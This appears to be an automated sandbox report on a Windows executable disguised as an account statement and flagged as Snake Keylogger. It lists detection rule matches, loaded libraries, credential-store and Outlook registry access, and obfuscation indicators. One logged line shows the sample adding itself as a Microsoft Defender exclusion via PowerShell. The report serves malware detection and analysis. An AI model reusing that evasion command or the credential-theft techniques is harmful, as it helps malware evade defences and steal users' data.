Source: 0.2.hesaphareketi-01.exe.4917370.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.hesaphareketi-01.exe.4917370.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.hesaphareketi-01.exe.4917370.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.hesaphareketi-01.exe.4917370.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: hesaphareketi-01.exe PID: 5860, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: hesaphareketi-01.exe PID: 5508, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: hesaphareketi-01.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.hesaphareketi-01.exe.4917370.0.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.hesaphareketi-01.exe.4917370.0.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.hesaphareketi-01.exe.4917370.0.raw.unpack, Bc-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack, Bc-.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, NyvrOwANqHHPpEqfI2.cs	Security API names: _0020.SetAccessControl
Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, NyvrOwANqHHPpEqfI2.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, NyvrOwANqHHPpEqfI2.cs	Security API names: _0020.AddAccessRule
Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, x42tUDawqVMVIAc1ru.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, NyvrOwANqHHPpEqfI2.cs	Security API names: _0020.SetAccessControl
Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, NyvrOwANqHHPpEqfI2.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, NyvrOwANqHHPpEqfI2.cs	Security API names: _0020.AddAccessRule
Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, x42tUDawqVMVIAc1ru.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/6@4/4

Source: C:\Users\user\Desktop\hesaphareketi-01.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hesaphareketi-01.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4324:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvkkfpcb.wd0.ps1

Jump to behavior

Source: hesaphareketi-01.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: hesaphareketi-01.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\hesaphareketi-01.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\hesaphareketi-01.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: hesaphareketi-01.exe, 00000000.00000000.1432378454.0000000000902000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: select * from [card] where [card].id = (select employees.[card] from employees where employees.id =quse employees; select [name] from department where id =
Source: hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002FA6000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002FCB000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002F97000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002F88000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: hesaphareketi-01.exe	ReversingLabs: Detection: 23%
Source: hesaphareketi-01.exe	Virustotal: Detection: 60%

Source: unknown	Process created: C:\Users\user\Desktop\hesaphareketi-01.exe "C:\Users\user\Desktop\hesaphareketi-01.exe"
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe"
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process created: C:\Users\user\Desktop\hesaphareketi-01.exe "C:\Users\user\Desktop\hesaphareketi-01.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe"	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process created: C:\Users\user\Desktop\hesaphareketi-01.exe "C:\Users\user\Desktop\hesaphareketi-01.exe"	Jump to behavior

Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\hesaphareketi-01.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\hesaphareketi-01.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\hesaphareketi-01.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: hesaphareketi-01.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: hesaphareketi-01.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: hesaphareketi-01.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: tEaO.pdbSHA256 source: hesaphareketi-01.exe
Source:	Binary string: tEaO.pdb source: hesaphareketi-01.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: hesaphareketi-01.exe, authorizationForm.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, NyvrOwANqHHPpEqfI2.cs	.Net Code: bOfN5fYpQ0 System.Reflection.Assembly.Load(byte[])
Source: 0.2.hesaphareketi-01.exe.56e0000.4.raw.unpack, MainForm.cs	.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.hesaphareketi-01.exe.499cb90.1.raw.unpack, NyvrOwANqHHPpEqfI2.cs	.Net Code: bOfN5fYpQ0 System.Reflection.Assembly.Load(byte[])
Source: 0.2.hesaphareketi-01.exe.3eba230.2.raw.unpack, MainForm.cs	.Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])

Source: hesaphareketi-01.exe

Static PE information: 0x90DC47B8 [Sun Jan 6 02:43:04 2047 UTC]

Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 0_2_06F6D230 pushad ; retf	0_2_06F6D231
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 0_2_06F6C82A push eax; retf	0_2_06F6C82D
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Code function: 4_2_011D9C30 push esp; retf 011Fh	4_2_011D9D55

Source: hesaphareketi-01.exe

Static PE information: section name: .text entropy: 7.58541302254658

Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, W4YSgpXx1TLZ2wuZI4.cs	High entropy of concatenated method names: 'ON4iJAfUus', 'wWeiWqINS4', 'qmeis8cequ', 'loTio5Df3r', 'L6giuChufQ', 'BGGivMsR00', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, Lru2IQueJDeFM6MNgS.cs	High entropy of concatenated method names: 'wyIxkdZBbf', 's5OxyWk0hN', 'k76xuZJI9R', 'zFZxdg53H6', 'yOIxWsP3sE', 'ThUxs9EcgP', 'i6mxoor4Hb', 'ULHxvOEwwV', 'qVnxOaj5ob', 'lNGx3BBUUD'
Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, AWEkJ5qunuLJQqAYM9.cs	High entropy of concatenated method names: 'Dispose', 'wAljXeLvR2', 'bVd7WKja8L', 'Ek5lljZyiP', 'JeqjLig4fW', 'yNnjzik6b5', 'ProcessDialogKey', 'Qsw7r4YSgp', 'o1T7jLZ2wu', 'SI477mKaYZ'
Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, BDUJmYCmvtMfBTT66g.cs	High entropy of concatenated method names: 'PfeDVlXivY', 'fh3DmheNpD', 'ToString', 'OnFDhQohdP', 'CKkDqrR9bH', 'YXPDKNlH02', 'i87D4ZUMJd', 'aF9Dce6yOj', 'ufCDIfcjLb', 'qvFDAQuNgC'
Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, B25QqgNEisqhgpsLwd.cs	High entropy of concatenated method names: 'UpUjI42tUD', 'WqVjAMVIAc', 'Ja3jV5rUqQ', 'wsSjmY4BSx', 'N53jx7eOdj', 'cA7jYcmgyH', 'yUJX9DSG3oxAsYdHXo', 'csoVAoJNHJNK7VWNNl', 'XOGjjRPB8Z', 'gCGjF24PXf'
Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, mWRLGq3HKbKsiVEl4x.cs	High entropy of concatenated method names: 'haAIh1qHPM', 'jxeIKM6Pux', 'MLQIcbAJ7i', 'KONcLfJyPv', 'fMNcztQn7w', 'RKFIrru9Mf', 'cPYIjPdXr6', 't3cI7P5ifp', 'SwNIFGtY7Z', 'kQGINgSFRu'
Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, bVfaPLzIGqxh2txVLx.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JbmGPLLQ98', 'SyNGxInUaU', 'NKGGYFdx4t', 'o9GGD8MHob', 'Y56Gif2pZ9', 'loiGGfYf7B', 'TBQGR7SB0a'
Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, LATEJv0a35rUqQfsSY.cs	High entropy of concatenated method names: 'HgWKSU01ds', 'iZ6KeevvP8', 'LBsKaUKB1g', 'LRUK0TxARd', 'bisKx4H4AV', 'R4lKY7n8cR', 'XaXKDoh55l', 'vlrKi5mZ3S', 'w20KGVu1Ly', 'EOFKRwuCw3'
Source: 0.2.hesaphareketi-01.exe.72b0000.5.raw.unpack, iBSxP497a3eAak537e.cs	High entropy of concatenated method names: 'Se141VLmW3', 'SSr4Tak5Vd', 'IRQKsjRKGV', 'foPKodsG0r', 'QS2KvJKLNG', 'GKoKOjuGmO', 'xiyK30s4Nj', 'tWOKHQlLEm', 'mVxKQA4KIZ', 'QabKkmV3xo'
